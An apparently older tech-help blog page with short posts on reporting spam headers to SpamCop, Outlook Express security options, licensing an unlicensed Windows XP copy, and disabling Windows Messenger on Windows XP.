SpamCop has a list of commonly used email programs, including AOL, with instructions for either displaying the full headers, and/or forwarding as an attachment.

With the source code copied to the Windows Clipboard you can paste it into the report text field in your SpamCop member's reporting page, or paste it into an email that you will send to an authority who can deal with tracing or reporting it, or you can paste it into a new Notepad document and save it for your own analysis.

Continue reading "How to display the headers of spam/scam emails, for reporting or tracing the source." »

Posted by Wiz at 11:17 AM | Permalink

back to top ^

I am frequently asked about securing the Outlook Express email client. One of the recurring questions is "why can't I receive file attachments in my email?"

Answer:
The default security setting for Outlook Express is to block file attachments. To allow attachments to be downloaded and opened click on the menu item "Tools" then on Options > Security, and UNCHECK the option labeled "Do not allow attachments to be saved or opened that could potentially be a virus."

What do the other security options control and what effect do they have on my email capabilities?

Virus Protection

"Select the Internet Explorer security zone to use:"
I would recommend selecting the radio option to use the Restricted sites zone(More secure), as it will disable some common exploit codes used by viruses, and spyware distributers. By reading email in the Restricted sites zone you prevent tracking cookies from loading, Javascript from running, and cloaked links to phishing sites will reveal their true destination when you hover the mouse over them.

"Warn me when other applications try to send email as me." This will alert you if a Worm gets onto your computer and starts sending out mass spam or virus infected emails that appear to come from you. While this won't catch more sophisticated email sending exploits (using their own SMTP engine), it may stop some exploits from going out with your return address in them. Always select this option.

Download Images:

"Block images and other external content in HTML e-mail."
If you select this option you will not be able to view images in your email. It also prevents tracking gifs, sound files, and flash ads from loading when you open an email. This pretty much cripples 80% of the email you may want to receive, in return for blocking images and tracking gifs in a small percentage of unsolicited commercial email (spam). I personally do not check this option.

The other options only apply to people who maintain digital ID certificates, to apply them when sending or receiving messsages. Most of us don't use any of those options.

After you have checked or unchecked your desired settings click Apply to save them, then OK to close the options window.

Continue reading "How to control the downloading of email attachments or other harmful content in Outlook Express" »

Posted by Wiz at 3:48 PM | Permalink

back to top ^

If you have been using an unlicensed copy of Windows XP, Home, Professional, Corporate, or Media version, you already know that Manual Windows Updates and optional Windows XP enhancements and driver updates are not available to you. You may have turned on Automatic Windows Updates to at least receive security patches. You may also be one of the millions of users of unlicensed installations of Windows XP to receive the WGA Piracy popup notices, when you login, and while you are using your computer. You may already know the one I mean. It says:

"This copy of Windows is not genuine; you may be a victim of software counterfeiting." The popups notices will continue to occur until such time as the computer owner installs a valid license code, which may require a phone call to Microsoft support.

In a previous article on this blog I covered the situation in depth, along with temporary workarounds and a permanent solution. This article deals with and recaps the better, permanent solution. Click on the Continue Reading link below, for the full details.

Continue reading "Converting an unlicensed copy of Windows XP to a legally, licensed version" »

Posted by Wiz at 1:11 PM | Permalink

back to top ^

If you're using MSN Messenger, or AIM, or Yahoo! or Trillian IM clients as your chat, IM or video conferencing tool, you may never use Windows Messenger and have tried to remove it from the startup group to keep it from appearing in your Systray. However, despite removing it from the Registry key that launches it you may have seen it return on occasion, and had to fight with it's icon and access denied messages while trying to shut it down.

The reason that Windows Messenger makes these unwanted re-appearances is that Outlook, Outlook Express and even some Microsoft Web pages can still make it load automatically. Fortunately, you can completely stop Windows Messenger from reappearing by making an alteration to the local group policy with the Group Policy Editor. You must be running with Administrator privileges to perform this action.

Here's what you should do:

For Windows XP Professional users:

1. Open the Run dialog box by pressing the keys - Windows + R, or click on Start > Run;

2. In the Open text box type Gpedit.msc and click OK to launch the Group Policy Editor.

3. Go to Computer Configuration | Administrative Templates | Windows Components | Windows Messenger.

4. Double-click the Do Not Allow Windows Messenger To Be Run setting.

5. In the resulting dialog box, select the Enabled option, and click OK

6. Close the Group Policy Editor.

How to disable Messenger in XP Home Edition

1: Solution #1 - Uninstall Messenger

2: Locate the file named SYSOC.INF in C:\Windows\Inf folder. NOTE: This folder and file are hidden by default.

3: Open SYSOC.INF with Notepad and locate this line: msmsgs=msgrocm.dll,OcEntry,msmsgs.inf,hide,7

4: Remove the word "hide" from the line, then close the file, saving the changes.

5: You can now use the Add/Remove Programs icon in the Control Panel to remove this Windows Component.

Stopping Windows Messenger from reappearing with Outlook Express

Even after you go through the trouble of "uninstalling" the darn thing, Windows Messenger still may pop up whenever you run Outlook Express -- which some people do every time they start Windows. To stop Outlook Express from bringing Windows Messenger back onto your System tray, follow these steps:

1. Open Outlook Express.
2. Choose Options from the Tools menu.
3. Click the General tab.
4. Click to remove the checkmark from the box marked, "Automatically log on to Windows Messenger."
5. Click the OK button.
6. Choose Layout from the View menu.
7. Click to remove the checkmark from Contacts.
8. Click the OK button to close the Window.

See more solutions in the extended comments ...

Continue reading "Disabling Windows Messenger on Windows XP Computers" »

Posted by Wiz at 12:19 PM | Permalink

back to top ^